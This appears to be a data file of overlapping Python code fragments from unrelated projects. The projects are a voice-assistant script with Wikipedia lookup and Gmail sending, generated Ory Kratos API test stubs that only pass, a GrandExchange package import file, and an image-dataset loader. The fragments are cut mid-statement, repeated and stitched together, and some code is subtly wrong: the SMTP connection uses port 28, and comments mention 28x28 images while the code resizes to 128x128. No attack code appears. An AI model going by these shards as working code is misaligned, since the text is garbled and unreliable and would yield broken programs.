"sent\") exit() except Exception as e: print(e) speak(\"Sorry,I am not", "read more increase sentence to decrease sentence decreease sentence speak(\"According", 
"in query: try: speak(\"What should i say\")#error present content =", "sentence speak(\"According to wikipedia\") #print(results) speak(results) elif 'open youtube' in", "__name__ == '__main__': wish_me() while True: query =take_command().lower() if 'wikipedia'", "= query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase sentence to", "webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\") elif \"play", "\"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) #", "#elif \"open command\" in query: # filelocation = \"path of", "file like above\" # os.startfile(filelocation) elif \" email to vijayesh\"", "wikipedia import webbrowser import os import smtplib engine = pyttsx3.init('sapi5')", "import os import smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices')", "should i say\")#error present content = take_command() to = \"<EMAIL>\"", "\"\"\" r = sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold" ]
[ "\"\"\" pass def test_admin_update_identity(self): \"\"\"Test case for admin_update_identity Update an", "Update an Identity # noqa: E501 \"\"\" pass def test_create_self_service_logout_flow_url_for_browsers(self):", "port you should use something like Nginx, Ory Oathkeeper, or", "# noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case for", "Public and administrative APIs are exposed on different ports. Public", "tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case for admin_create_identity Create an", "# noqa: E501 \"\"\" pass def test_initialize_self_service_recovery_flow_without_browser(self): \"\"\"Test case for", "\"\"\" pass def test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings", "APIs. Public and administrative APIs are exposed on different ports.", "\"\"\" pass def test_submit_self_service_registration_flow(self): \"\"\"Test case for submit_self_service_registration_flow Submit a", "# noqa: E501 \"\"\" pass if __name__ == '__main__': unittest.main()", "test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete Verification Flow # noqa:", "self.api = V0alpha1Api() # noqa: E501 def tearDown(self): pass def", "create_self_service_logout_flow_url_for_browsers Create a Logout URL for Browsers # noqa: E501", "submit_self_service_logout_flow_without_browser Perform Logout for APIs, Services, Apps, ... # noqa:", "for get_self_service_recovery_flow Get Recovery Flow # noqa: E501 \"\"\" pass", "any other technology capable of authorizing incoming requests. # noqa:", "case for get_self_service_recovery_flow Get Recovery Flow # noqa: E501 \"\"\"", "test_get_self_service_settings_flow(self): \"\"\"Test case for get_self_service_settings_flow Get Settings Flow # noqa:", "case for get_self_service_error Get Self-Service Errors # noqa: E501 \"\"\"", "\"\"\"Test case for get_self_service_login_flow Get Login Flow # noqa: E501", "Services, Apps, ... # noqa: E501 \"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self):", "APIs, Services, Apps, ... 
# noqa: E501 \"\"\" pass def", "case for get_self_service_settings_flow Get Settings Flow # noqa: E501 \"\"\"", "the Current HTTP Session Belongs To # noqa: E501 \"\"\"", "# noqa: E501 def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case", "\"\"\" pass def test_admin_list_identities(self): \"\"\"Test case for admin_list_identities List Identities", "Initialize Settings Flow for Browsers # noqa: E501 \"\"\" pass", "# noqa: E501 \"\"\" pass def test_admin_get_identity(self): \"\"\"Test case for", "E501 \"\"\" pass def test_submit_self_service_verification_flow(self): \"\"\"Test case for submit_self_service_verification_flow Complete", "\"\"\"Test case for get_json_schema \"\"\" pass def test_get_self_service_error(self): \"\"\"Test case", "Link # noqa: E501 \"\"\" pass def test_admin_delete_identity(self): \"\"\"Test case", "test_initialize_self_service_settings_flow_without_browser(self): \"\"\"Test case for initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs,", "stubs\"\"\" def setUp(self): self.api = V0alpha1Api() # noqa: E501 def", "\"\"\"Test case for initialize_self_service_recovery_flow_for_browsers Initialize Recovery Flow for Browsers #", "case for submit_self_service_verification_flow Complete Verification Flow # noqa: E501 \"\"\"", "\"\"\" pass def test_get_json_schema(self): \"\"\"Test case for get_json_schema \"\"\" pass", "any protection while administrative APIs should never be exposed without", "Identities # noqa: E501 \"\"\" pass def test_admin_update_identity(self): \"\"\"Test case", "noqa: E501 def tearDown(self): pass def test_admin_create_identity(self): \"\"\"Test case for", "pass def test_initialize_self_service_login_flow_without_browser(self): \"\"\"Test case for initialize_self_service_login_flow_without_browser Initialize Login Flow", "for initialize_self_service_verification_flow_without_browser Initialize Verification Flow for APIs, Services, Apps, ...", "pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings Flow", "for get_self_service_settings_flow Get Settings Flow # noqa: E501 \"\"\" pass", "initialize_self_service_settings_flow_without_browser Initialize Settings Flow for APIs, Services, Apps, ... #", "APIs can face the public internet without any protection while", "def test_to_session(self): \"\"\"Test case for to_session Check Who the Current", "\"\"\"Test case for admin_create_self_service_recovery_link Create a Recovery Link # noqa:", "... # noqa: E501 \"\"\" pass def test_submit_self_service_login_flow(self): \"\"\"Test case", "\"\"\" pass def test_initialize_self_service_settings_flow_for_browsers(self): \"\"\"Test case for initialize_self_service_settings_flow_for_browsers Initialize Settings", "protection while administrative APIs should never be exposed without prior", "case for initialize_self_service_registration_flow_without_browser Initialize Registration Flow for APIs, Services, Apps,", "noqa: E501 \"\"\" pass def test_submit_self_service_recovery_flow(self): \"\"\"Test case for submit_self_service_recovery_flow", "for submit_self_service_recovery_flow Complete Recovery Flow # noqa: E501 \"\"\" pass", "should never be exposed without prior authorization. To protect the", "case for create_self_service_logout_flow_url_for_browsers Create a Logout URL for Browsers #", "exposed on different ports. 
Public APIs can face the public internet without any protection while administrative APIs should never be exposed without prior authorization. To protect the administrative API port you should use something like Nginx, Ory Oathkeeper, or any other technology capable of authorizing incoming requests.  # noqa: E501

    The version of the OpenAPI document: v0.7.0-alpha.1
    Contact: <EMAIL>
    Generated by: https://openapi-generator.tech
"""

import unittest

import ory_kratos_client
from ory_kratos_client.api.v0alpha1_api import V0alpha1Api  # noqa: E501


class TestV0alpha1Api(unittest.TestCase):
    """V0alpha1Api unit test stubs"""

    def setUp(self):
        self.api = V0alpha1Api()  # noqa: E501

    def tearDown(self):
        pass

    def test_admin_create_identity(self):
        """Test case for admin_create_identity

        Create an Identity  # noqa: E501
        """
        pass

    def test_admin_create_self_service_recovery_link(self):
        """Test case for admin_create_self_service_recovery_link

        Create a Recovery Link  # noqa: E501
        """
        pass

    def test_admin_delete_identity(self):
        """Test case for admin_delete_identity

        Delete an Identity  # noqa: E501
        """
        pass

    def test_admin_get_identity(self):
        """Test case for admin_get_identity

        Get an Identity  # noqa: E501
        """
        pass

    def test_admin_list_identities(self):
        """Test case for admin_list_identities

        List Identities  # noqa: E501
        """
        pass

    def test_admin_update_identity(self):
        """Test case for admin_update_identity

        Update an Identity  # noqa: E501
        """
        pass

    def test_create_self_service_logout_flow_url_for_browsers(self):
        """Test case for create_self_service_logout_flow_url_for_browsers

        Create a Logout URL for Browsers  # noqa: E501
        """
        pass

    def test_get_json_schema(self):
        """Test case for get_json_schema

        """
        pass

    def test_get_self_service_error(self):
        """Test case for get_self_service_error

        Get Self-Service Errors  # noqa: E501
        """
        pass

    def test_get_self_service_login_flow(self):
        """Test case for get_self_service_login_flow

        Get Login Flow  # noqa: E501
        """
        pass

    def test_get_self_service_recovery_flow(self):
        """Test case for get_self_service_recovery_flow

        Get Recovery Flow  # noqa: E501
        """
        pass

    def test_get_self_service_registration_flow(self):
        """Test case for get_self_service_registration_flow

        Get Registration Flow  # noqa: E501
        """
        pass

    def test_get_self_service_settings_flow(self):
        """Test case for get_self_service_settings_flow

        Get Settings Flow  # noqa: E501
        """
        pass

    def test_get_self_service_verification_flow(self):
        """Test case for get_self_service_verification_flow

        Get Verification Flow  # noqa: E501
        """
        pass

    def test_initialize_self_service_login_flow_for_browsers(self):
        """Test case for initialize_self_service_login_flow_for_browsers

        Initialize Login Flow for Browsers  # noqa: E501
        """
        pass

    def test_initialize_self_service_login_flow_without_browser(self):
        """Test case for initialize_self_service_login_flow_without_browser

        Initialize Login Flow for APIs, Services, Apps, ...  # noqa: E501
        """
        pass

    def test_initialize_self_service_recovery_flow_for_browsers(self):
        """Test case for initialize_self_service_recovery_flow_for_browsers

        Initialize Recovery Flow for Browsers  # noqa: E501
        """
        pass

    def test_initialize_self_service_recovery_flow_without_browser(self):
        """Test case for initialize_self_service_recovery_flow_without_browser

        Initialize Recovery Flow for APIs, Services, Apps, ...  # noqa: E501
        """
        pass

    def test_initialize_self_service_registration_flow_for_browsers(self):
        """Test case for initialize_self_service_registration_flow_for_browsers

        Initialize Registration Flow for Browsers  # noqa: E501
        """
        pass

    def test_initialize_self_service_registration_flow_without_browser(self):
        """Test case for initialize_self_service_registration_flow_without_browser

        Initialize Registration Flow for APIs, Services, Apps, ...  # noqa: E501
        """
        pass

    def test_initialize_self_service_settings_flow_for_browsers(self):
        """Test case for initialize_self_service_settings_flow_for_browsers

        Initialize Settings Flow for Browsers  # noqa: E501
        """
        pass

    def test_initialize_self_service_settings_flow_without_browser(self):
        """Test case for initialize_self_service_settings_flow_without_browser

        Initialize Settings Flow for APIs, Services, Apps, ...  # noqa: E501
        """
        pass

    def test_initialize_self_service_verification_flow_for_browsers(self):
        """Test case for initialize_self_service_verification_flow_for_browsers

        Initialize Verification Flow for Browser Clients  # noqa: E501
        """
        pass

    def test_initialize_self_service_verification_flow_without_browser(self):
        """Test case for initialize_self_service_verification_flow_without_browser

        Initialize Verification Flow for APIs, Services, Apps, ...  # noqa: E501
        """
        pass

    def test_submit_self_service_login_flow(self):
        """Test case for submit_self_service_login_flow

        Submit a Login Flow  # noqa: E501
        """
        pass

    def test_submit_self_service_logout_flow(self):
        """Test case for submit_self_service_logout_flow

        Complete Self-Service Logout  # noqa: E501
        """
        pass

    def test_submit_self_service_logout_flow_without_browser(self):
        """Test case for submit_self_service_logout_flow_without_browser

        Perform Logout for APIs, Services, Apps, ...  # noqa: E501
        """
        pass

    def test_submit_self_service_recovery_flow(self):
        """Test case for submit_self_service_recovery_flow

        Complete Recovery Flow  # noqa: E501
        """
        pass

    def test_submit_self_service_registration_flow(self):
        """Test case for submit_self_service_registration_flow

        Submit a Registration Flow  # noqa: E501
        """
        pass

    def test_submit_self_service_settings_flow(self):
        """Test case for submit_self_service_settings_flow

        Complete Settings Flow  # noqa: E501
        """
        pass

    def test_submit_self_service_verification_flow(self):
        """Test case for submit_self_service_verification_flow

        Complete Verification Flow  # noqa: E501
        """
        pass

    def test_to_session(self):
        """Test case for to_session

        Check Who the Current HTTP Session Belongs To  # noqa: E501
        """
        pass


if __name__ == '__main__':
    unittest.main()
[ "from .item import Item from .priceinfo import PriceInfo from .pricetrend", "import Item from .priceinfo import PriceInfo from .pricetrend import PriceTrend", ".grandexchange import GrandExchange, GameItemNotFound, GameItemParseError from .item import Item from", "GameItemParseError from .item import Item from .priceinfo import PriceInfo from", ".item import Item from .priceinfo import PriceInfo from .pricetrend import", "from .grandexchange import GrandExchange, GameItemNotFound, GameItemParseError from .item import Item", "import GrandExchange, GameItemNotFound, GameItemParseError from .item import Item from .priceinfo", "GrandExchange, GameItemNotFound, GameItemParseError from .item import Item from .priceinfo import", "GameItemNotFound, GameItemParseError from .item import Item from .priceinfo import PriceInfo" ]
[ "extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting the", "# label # data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist()", "cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image = cv2.resize(image, (128,", "img_path) # extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain =", "DataLoader: def load_data(): ''' This function is handling the data", "= [] y_train = [] x_test = [] y_test =", "the data loading and pre-processing :return: (xtrain, ytrain), (xtest, ytest)", "= os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path,", "is handling the data loading and pre-processing :return: (xtrain, ytrain),", "as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: #", "train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the", "os import numpy as np import cv2 from utils import", "= os.path.join(train_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)", "x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path to", "import numpy as np import cv2 from utils import constants", "# reading meta data file as dataframe df = pd.read_csv(metadata_csv_path,", "current image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image image", "dataset format: # image_name # label # data_type data_type_row =", "the path of the current image img_path = os.path.join(train_img_dir_path, image_row[row])", "''' This function is handling the data loading and pre-processing", "data_rows = len(data_type_row) for row in range(data_rows): if (data_type_row[row] ==", "for row in range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting", "delimiter=',') # dataset format: # image_name # label # data_type", "pd import os import numpy as np import cv2 from", "y_train = [] x_test = [] y_test = [] #", "****') x_train = [] y_train = [] x_test = []", "DAugmentor ****') x_train = [] y_train = [] x_test =", "print(\"Loaded: \" + img_path) # extracting labels y_test.append(label_row[row]) xtrain =", "+ img_path) # extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain", "128)) x_train.append(image) print(\"Loaded: \" + img_path) # extracting labels y_train.append(label_row[row])", "(data_type_row[row] == \"TRAIN\"): # setting the path of the current", "import os import numpy as np import cv2 from utils", "''' print('**** Read data into DAugmentor ****') x_train = []", "class DataLoader: def load_data(): ''' This function is handling the", "image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling", "# extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting", "const.DIR_TRAIN) print(metadata_csv_path) # setting the path to train data x_train_path", "df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row)", "as np import cv2 from utils import constants as const", "ytrain), (xtest, ytest) ''' print('**** Read data into DAugmentor ****')", "image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image", "path of the current image img_path = os.path.join(test_img_dir_path, image_row[row]) #", "np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test) 
print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape)", "# downscaling image to 28x28 image = cv2.resize(image, (128, 128))", "= np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train,", "ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test,", "if (data_type_row[row] == \"TEST\"): # setting the path of the", "loading and pre-processing :return: (xtrain, ytrain), (xtest, ytest) ''' print('****", "downscaling image to 28x28 image = cv2.resize(image, (128, 128)) x_test.append(image)", "= os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path to train", "\" + img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row] ==", "meta data file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') #", "os.path.join(train_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) #", "file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format:", "pandas as pd import os import numpy as np import", "format: # image_name # label # data_type data_type_row = df[\"data_type\"].tolist()", "len(data_type_row) for row in range(data_rows): if (data_type_row[row] == \"TRAIN\"): #", "y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test)", "to 28x28 image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \"", "= cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" + img_path) #", "setting the path of the current image img_path = os.path.join(test_img_dir_path,", "pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name # label #", "reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to", "and pre-processing :return: (xtrain, ytrain), (xtest, ytest) ''' print('**** Read", "current image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image image", "os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path to train data", "data x_test_path = os.path.join(path, const.DIR_TEST) # reading meta data file", "ytest) ''' print('**** Read data into DAugmentor ****') x_train =", "[] y_test = [] # setting the path to metadata", "= os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting", "df[\"label\"].tolist() data_rows = len(data_type_row) for row in range(data_rows): if (data_type_row[row]", "cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image = cv2.resize(image,", "pre-processing :return: (xtrain, ytrain), (xtest, ytest) ''' print('**** Read data", "the path to metadata path = const.PATH metadata_csv_path = os.path.join(path,", "# reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image", "os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the", "print(x_train_path) # setting the path to train data x_test_path =", "# image_name # label # data_type data_type_row = df[\"data_type\"].tolist() image_row", "y_test = [] # setting the path to metadata path", "to metadata path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path", "range(data_rows): if (data_type_row[row] == \"TRAIN\"): 
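
# A minimal usage sketch (assumes utils/constants.py defines PATH,
# FILE_METADATA, DIR_TRAIN and DIR_TEST, and that the metadata CSV and
# image directories exist on disk):
if __name__ == "__main__":
    (xtrain, ytrain), (xtest, ytest) = DataLoader.load_data()
    print("train:", xtrain.shape, ytrain.shape)
    print("test:", xtest.shape, ytest.shape)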
# setting the path of", "the current image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image", "in range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting the path", "image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28", "import pandas as pd import os import numpy as np", "<gh_stars>1-10 import pandas as pd import os import numpy as", "const.DIR_TRAIN) print(x_train_path) # setting the path to train data x_test_path", "np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return", "into DAugmentor ****') x_train = [] y_train = [] x_test", "# setting the path of the current image img_path =", "setting the path to train data x_test_path = os.path.join(path, const.DIR_TEST)", "image to 28x28 image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded:", "as const import matplotlib.pyplot as plt class DataLoader: def load_data():", "[] y_train = [] x_test = [] y_test = []", "import cv2 from utils import constants as const import matplotlib.pyplot", "This function is handling the data loading and pre-processing :return:", "\"TRAIN\"): # setting the path of the current image img_path", "def load_data(): ''' This function is handling the data loading", "numpy as np import cv2 from utils import constants as", "data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows", "[] # setting the path to metadata path = const.PATH", ":return: (xtrain, ytrain), (xtest, ytest) ''' print('**** Read data into", "metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path =", "= [] # setting the path to metadata path =", "extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest", "(data_type_row[row] == \"TEST\"): # setting the path of the current", "data into DAugmentor ****') x_train = [] y_train = []", "df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for row in", "= df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows =", "print(metadata_csv_path) # setting the path to train data x_train_path =", "xtest = np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape)", "path to train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) #", "x_test_path = os.path.join(path, const.DIR_TEST) # reading meta data file as", "image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image image =", "if (data_type_row[row] == \"TRAIN\"): # setting the path of the", "image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" + img_path)", "import matplotlib.pyplot as plt class DataLoader: def load_data(): ''' This", "# data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row =", "= df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for row", "matplotlib.pyplot as plt class DataLoader: def load_data(): ''' This function", "train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path to", "os.path.join(test_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, 
cv2.IMREAD_GRAYSCALE) #", "28x28 image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" +", "os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN)", "np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test)", "image_name # label # data_type data_type_row = df[\"data_type\"].tolist() image_row =", "from utils import constants as const import matplotlib.pyplot as plt", "print(\"Loaded: \" + img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row]", "labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting the path", "img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path,", "data loading and pre-processing :return: (xtrain, ytrain), (xtest, ytest) '''", "data file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset", "df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name #", "cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" + img_path) # extracting", "# setting the path to train data x_test_path = os.path.join(path,", "x_train = [] y_train = [] x_test = [] y_test", "labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest =", "cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded: \" + img_path) # extracting", "= [] y_test = [] # setting the path to", "= np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test)", "label # data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row", "128)) x_test.append(image) print(\"Loaded: \" + img_path) # extracting labels y_test.append(label_row[row])", "path to metadata path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA)", "= const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST)", "const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path)", "28x28 image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" +", "= os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path to train", "to train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting", "constants as const import matplotlib.pyplot as plt class DataLoader: def", "img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): #", "print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain, ytrain), (xtest, ytest)", "= os.path.join(test_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path, cv2.IMREAD_GRAYSCALE)", "metadata path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path =", "# dataset format: # image_name # label # data_type data_type_row", "of the current image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading", "downscaling image to 28x28 image = cv2.resize(image, (128, 128)) x_train.append(image)", "row in range(data_rows): if (data_type_row[row] == \"TRAIN\"): # setting the", "setting the path of the current image img_path = os.path.join(train_img_dir_path,", "= 
len(data_type_row) for row in range(data_rows): if (data_type_row[row] == \"TRAIN\"):", "x_train.append(image) print(\"Loaded: \" + img_path) # extracting labels y_train.append(label_row[row]) if", "== \"TEST\"): # setting the path of the current image", "# setting the path to metadata path = const.PATH metadata_csv_path", "utils import constants as const import matplotlib.pyplot as plt class", "xtrain = np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest", "plt class DataLoader: def load_data(): ''' This function is handling", "print('**** Read data into DAugmentor ****') x_train = [] y_train", "import constants as const import matplotlib.pyplot as plt class DataLoader:", "= [] x_test = [] y_test = [] # setting", "(xtest, ytest) ''' print('**** Read data into DAugmentor ****') x_train", "img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image image = cv2.imread(img_path,", "== \"TRAIN\"): # setting the path of the current image", "cv2 from utils import constants as const import matplotlib.pyplot as", "print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain, ytrain), (xtest,", "the current image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading image", "y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"): # setting the path of", "ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape)", "load_data(): ''' This function is handling the data loading and", "= pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name # label", "train data x_test_path = os.path.join(path, const.DIR_TEST) # reading meta data", "os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path to train data", "reading meta data file as dataframe df = pd.read_csv(metadata_csv_path, delimiter=',')", "of the current image img_path = os.path.join(train_img_dir_path, image_row[row]) # reading", "data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path) # setting the path", "label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for row in range(data_rows):", "np.asarray(x_test) ytest = np.asarray(y_test) print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train),", "to 28x28 image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \"", "const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) # setting the path", "the path to train data x_train_path = os.path.join(path, const.DIR_TRAIN) print(x_train_path)", "as pd import os import numpy as np import cv2", "(128, 128)) x_test.append(image) print(\"Loaded: \" + img_path) # extracting labels", "# extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train) ytrain = np.asarray(y_train)", "x_test.append(image) print(\"Loaded: \" + img_path) # extracting labels y_test.append(label_row[row]) xtrain", "= cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" + img_path) #", "= np.asarray(x_train) ytrain = np.asarray(y_train) xtest = np.asarray(x_test) ytest =", "# setting the path to train data x_train_path = os.path.join(path,", "path = const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path,", "const.DIR_TEST) # reading meta data file as dataframe df =", "setting the path to train data x_train_path = os.path.join(path, const.DIR_TRAIN)", 
"(128, 128)) x_train.append(image) print(\"Loaded: \" + img_path) # extracting labels", "+ img_path) # extracting labels y_train.append(label_row[row]) if (data_type_row[row] == \"TEST\"):", "x_test = [] y_test = [] # setting the path", "the path to train data x_test_path = os.path.join(path, const.DIR_TEST) #", "as plt class DataLoader: def load_data(): ''' This function is", "\" + img_path) # extracting labels y_test.append(label_row[row]) xtrain = np.asarray(x_train)", "const.PATH metadata_csv_path = os.path.join(path, const.FILE_METADATA) test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path", "to train data x_test_path = os.path.join(path, const.DIR_TEST) # reading meta", "handling the data loading and pre-processing :return: (xtrain, ytrain), (xtest,", "= os.path.join(path, const.DIR_TEST) # reading meta data file as dataframe", "image to 28x28 image = cv2.resize(image, (128, 128)) x_test.append(image) print(\"Loaded:", "dataframe df = pd.read_csv(metadata_csv_path, delimiter=',') # dataset format: # image_name", "os.path.join(path, const.DIR_TEST) # reading meta data file as dataframe df", "function is handling the data loading and pre-processing :return: (xtrain,", "image img_path = os.path.join(test_img_dir_path, image_row[row]) # reading image image =", "print(x_train[0].shape) print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain,", "print(x_train[0].shape) print(xtrain[0].shape) print(x_test[0].shape) #(X_train, y_train), (X_test, y_test) return (xtrain, ytrain),", "data_type data_type_row = df[\"data_type\"].tolist() image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist()", "(xtrain, ytrain), (xtest, ytest) ''' print('**** Read data into DAugmentor", "const import matplotlib.pyplot as plt class DataLoader: def load_data(): '''", "the path of the current image img_path = os.path.join(test_img_dir_path, image_row[row])", "= cv2.imread(img_path, cv2.IMREAD_GRAYSCALE) # downscaling image to 28x28 image =", "path of the current image img_path = os.path.join(train_img_dir_path, image_row[row]) #", "setting the path to metadata path = const.PATH metadata_csv_path =", "\"TEST\"): # setting the path of the current image img_path", "image = cv2.resize(image, (128, 128)) x_train.append(image) print(\"Loaded: \" + img_path)", "path to train data x_test_path = os.path.join(path, const.DIR_TEST) # reading", "image_row = df[\"image_name\"].tolist() label_row = df[\"label\"].tolist() data_rows = len(data_type_row) for", "Read data into DAugmentor ****') x_train = [] y_train =", "[] x_test = [] y_test = [] # setting the", "np import cv2 from utils import constants as const import", "test_img_dir_path = os.path.join(path, const.DIR_TEST) train_img_dir_path = os.path.join(path, const.DIR_TRAIN) print(metadata_csv_path) #", "= df[\"label\"].tolist() data_rows = len(data_type_row) for row in range(data_rows): if", "= np.asarray(y_train) xtest = 